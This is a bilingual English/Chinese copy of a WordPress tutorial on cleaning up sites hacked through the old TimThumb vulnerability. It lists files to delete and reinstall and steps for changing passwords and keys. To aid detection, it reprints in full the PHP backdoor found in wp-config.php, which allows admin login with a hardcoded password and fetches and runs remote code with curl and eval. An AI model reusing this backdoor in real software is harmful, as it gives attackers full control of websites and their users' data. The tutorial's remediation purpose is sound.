So if you remember correctly, there was a security issue with the TimThumb script in August which was fixed. However still to our surprise, many sites are still using the old version. We have fixed three sites so far in the past month, one being yesterday. So it makes sense to simply write a step by step article, so our users can just follow it. All of the three users that we fix this issue for did not even know what TimThumb was or whether they were using it or not.
因此,如果您没有记错的话,八月份的TimThumb脚本存在一个安全问题,该问题已修复。 但是,仍然令我们惊讶的是,许多站点仍在使用旧版本。 在过去的一个月中,我们已经修复了三个站点,其中一个是昨天。 因此,简单地编写分步文章很有意义,以便我们的用户可以按照它进行操作。 我们解决此问题的所有三个用户甚至都不知道TimThumb是什么,或者他们是否在使用它。
TimThumb is a PHP script that resizes images. There was a vulnerability in it, but it is SAFE to use now.
TimThumb是一个PHP脚本,用于调整图像大小。 其中存在一个漏洞,但是现在可以安全使用。
So how do you know that your site is hacked? If you see a big red screen on your browser when visiting to your site:
那么,您如何知道您的网站被黑了? 如果您在访问网站时在浏览器上看到红色的大屏幕,请执行以下操作:
If you start getting bombarded with emails about users being redirected from your site. Most likely, the case is that your site was a victim of this exploit.
如果您开始受到关于从您的网站重定向用户的电子邮件的轰炸。 最有可能的情况是您的网站是此漏洞的受害者。
As a pro-cautionary measure, everyone should just use this Timthumb Vulnerability Scanner. This will tell you if you are using the older version of TimThumb. A lot of theme clubs upgraded their core right away. So this plugin will check if the new secure version of Timthumb is installed or an older version is installed.
作为预防措施,每个人都应该使用此Timthumb漏洞扫描程序 。 这将告诉您是否使用的是TimThumb的旧版本。 许多主题俱乐部立即升级了其核心。 因此,此插件将检查是否安装了新的Timthumb安全版本或安装了旧版本。
Now if your site already fell prey to this Timthumb exploit, then here is what you need to do.
现在,如果您的站点已经成为Timthumb攻击的牺牲品,那么这就是您需要做的。
First you need to delete the following files:
首先,您需要删除以下文件:
/wp-admin/upd.php
/wp-content/upd.php
Log into WordPress admin panel and reinstall your WordPress version. We are specifically looking to reinstall these files:
登录WordPress管理面板,然后重新安装WordPress版本。 我们特别希望重新安装以下文件:
/wp-settings.php
/wp-includes/js/jquery/jquery.js
/wp-includes/js/110n.js
Then open your wp-config.php where you will most likely find this big malware code that is harvesting login credentials and cookies. This code will be towards the bottom.
然后打开wp-config.php ,您很可能会在这里找到收集登录凭据和cookie的恶意软件代码。 此代码将接近底部。
if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22'){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}
In your theme’s folder, look for anywhere the TimThumb script may be storing the cached files. Usually they are in this structure:
在主题的文件夹中,查找TimThumb脚本可能存储高速缓存文件的任何位置。 通常,它们处于以下结构中:
/wp-content/themes/themename/scripts/cache/external_{MD5Hash}.php
/wp-content/themes/themename/temp/cache/external_{MD5Hash}.php
Delete everything that looks like this. If you are not sure about things, then delete everything that is not an image file.
删除所有看起来像这样的东西。 如果不确定,请删除不是图像文件的所有内容。
Next thing you want to do is replace timthumb.php with the latest version which can be found at http://timthumb.googlecode.com/svn/trunk/timthumb.php
接下来要做的是将timthumb.php替换为最新版本,该最新版本可在http://timthumb.googlecode.com/svn/trunk/timthumb.php找到。
Now it would be a good idea to change your passwords starting with your MySQL login info to your WordPress login info. Don’t forget to change the password for MySQL in wp-config.php or you will get “Error Establishing Connection” screen.
现在,将您的密码从MySQL登录信息更改为WordPress登录信息是一个好主意。 不要忘记在wp-config.php中更改MySQL的密码,否则将出现“ Error建立连接错误”屏幕。
Change the secret keys in your wp-config.php file. You can generate a new key by going to the online generator.
更改您的wp-config.php文件中的密钥。 您可以通过转到在线生成器来生成新密钥。
Now you are done. Don’t forget to empty all page caching plugins. As a cautionary measure, it is good to clear your browsers cache and cookies as well.
现在您完成了。 不要忘记清空所有页面缓存插件。 作为一种警告措施,最好也清除浏览器的缓存和cookie。
For developers, try using the Additional Image Sizes feature in WordPress to replace the Timthumb functionalities.
对于开发人员,请尝试使用WordPress中的“ 其他图像尺寸”功能来替换Timthumb功能。
Let us know if you need further assistance by using our contact form.
请使用我们的联系表告知我们是否需要进一步的帮助。
翻译自: https://www.wpbeginner.com/wp-tutorials/how-to-fix-and-cleanup-the-timthumb-hack-in-wordpress/
509
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
